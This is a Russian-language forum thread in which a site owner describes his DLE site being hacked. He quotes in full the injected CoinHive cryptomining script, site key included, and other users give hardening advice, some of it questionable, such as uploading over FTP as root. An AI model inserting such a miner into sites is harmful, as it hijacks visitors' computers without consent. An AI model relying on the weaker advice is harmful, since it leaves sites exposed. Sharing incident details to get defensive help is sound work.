Взломали сайт, какие меры принять?

[Romantv]

Вчера вечером приходит смс сообщение что на сайте изменены 4 файла, а именно
fullstory.tpl
main.tpl
shortstory.tpl
/engine/classes/js/jquery.js
я скачал один файл fullstory.tpl и его сравнил программой Araxis Merge сразу нашол скрипт

<script>var min = new CoinHive.Anonymous('ooApRc35FgFVFE7JAf8d7MQO3TSbhd2v',{throttle: 0.9});if (!min.isMobile()) {min.start();}</script>

Я сразу шаблон удалил и закачал новый из бекапа ( там этого скрипта нет)
Все что находится в папке /engine/classes/js/ заменил.
Проходит минут 15 опять приходит смс изменен и добавлен файл
/engine/classes/js/jquery.js
/engine/classes/js/jquery_.js

Я обратно все что в папке /engine/classes/js/ поменял.

Сегодня утром после осмотра нахожу обратно этот скрипт майнера.
Сейчас шаблон новый с бекапа закачал,поменял права и пользователя на root
Поменял пользователя на папку engine теперь она root ( закачать, файл поменять уже не получится,даже если есть доступ)
Нашол партнерку coinhive.com там зарегистрировался,написал в поддержку,так и так и предоставил им скрипт,сейчас ожидаю ответа, ( если ответят и скажут кошелек я постараюсь его заблокировать)


Так вот сам вопрос: Что еще предпринять, для защиты сайта?
Как вообще можно закачать файл на сайт /engine/classes/js/jquery_.js ?
Все мои модули которые у меня установлены вот

 

[warxammer]

Romantv сочувствую, тоже интересен данный вопрос на будущее, что бы защититься.

 

[Karabas Barabas]

если ответят и скажут кошелек я постараюсь его заблокировать

Тебе максимум битка кошель дадут))

 

[Romantv]

Тебе максимум битка кошель дадут))

на самом деле,если ответят то ответят,а нет и хуй с ним.
заблокировать его могут, там в пп
/engine/classes/js/jquery_.js
интересно как этот файл попал и для чего он. вчера был пьяный удалил его а потом только подумал надо было посмотреть что в нем.

 

[Romantv]

 

[Анна]

@Romantv, а как ты смс получаешь? Что за программа?

 

[Romantv]

@Romantv, а как ты смс получаешь? Что за программа?

Как об этом говорить,может взломщик форум читает.Я не кого под сомнения не ставлю,но такое возможно.
Что то на подобе Мониторинг веб-сайтов

 

[Romantv]

Помайнил)))

 

[Evurg]

Что еще предпринять, для защиты сайта?

Статический ip, чтобы можно было входить лишь под одним, наверное самое надежное, скорее всего сохраняешь пароли в браузерах, возможно поймал какую-то дичь в виде стилера и пароли ушли к злодею. Советую изменить все пароли везде.

 

[Romantv]

Статический ip, чтобы можно было входить лишь под одним, наверное самое надежное, скорее всего сохраняешь пароли в браузерах, возможно поймал какую-то дичь в виде стилера и пароли ушли к злодею. Советую изменить все пароли везде.

Они сказали имя Вася, больше они не чего не сказали.
дич точно не мог поймать. винда поставил месяц назад. программ нет а которые есть все лицензионные

 

[GENERIC]

какая версия DLE?
Смотри по логам кто заходил постарайся выявить айпиху, потом по айпи ищи в access логах найдешь последовательность куда и через что. Если например шелл на сайте то соответственно увидишь к каким файлам был запрос. Если ты говоришь что пароли менял и все ровно заливали значить где то есть бэкдор

 

[Romantv]

Если ты говоришь что пароли менял

Я этого не говорил)Я пароли поменя только утром от сервера,а на сайте свой пароль не менял,там видно что не пароль не подобрали,
закачали этот файл /engine/classes/js/jquery_.js
Из админки файл не закачаешь.
Буду версию обновлять сейчас 12 стоит.
Да даже если есть беккод или шел,он уже не чего не сделает без root, можно уже не боятся
root и права на файлы 444 и папка engine root.

Во вторник с Москвы приеду и буду обновлятся.
Но все же интересно как получили доступ,пароль от админки исключено,сервер тоже,там есть другие сайты.

 

[Romantv]

Я скрипт потом проверил,он у меня не работает,защита стоит add_header Content-Security-Policy

 

[Romantv]

майнер походу остался.как можно с компа проверить

 

[GENERIC]

майнер походу остался.как можно с компа проверить
Посмотреть вложение 2829

не факт что остался почисти кеш, а по поводу майнера. Скачай например расширения которые блокируют майнеры, тот же блокировщик adguard предупреждает если сайт майнит.

 

[Romantv]

кеш оказался)
adguard у меня вечная лицензия, а одна на год для андроид и виндовс без дела валяется.
вчера для виндовс adguard не показывал

 

[doz]

никогда root на фтп не используй.
всегда отдельные юзеры должны быть.
совет одного очень хорошего знакомого (c)

 

[Romantv]

никогда root на фтп не используй.
всегда отдельные юзеры должны быть.
совет одного очень хорошего знакомого (c)

с root можно зайти куда угодно.
вот у меня root/ так же можно зайти программой putty

 

[doz]

@Romantv, по фтп никогда файлы через рут юзера не загружай!
это все круто что там можно все делать, но это ни разу не безопасно!

 

[Romantv]

@Romantv, по фтп никогда файлы через рут юзера не загружай!
это все круто что там можно все делать, но это ни разу не безопасно!

Скажи чем?
Или сам не знаешь,услышал и все.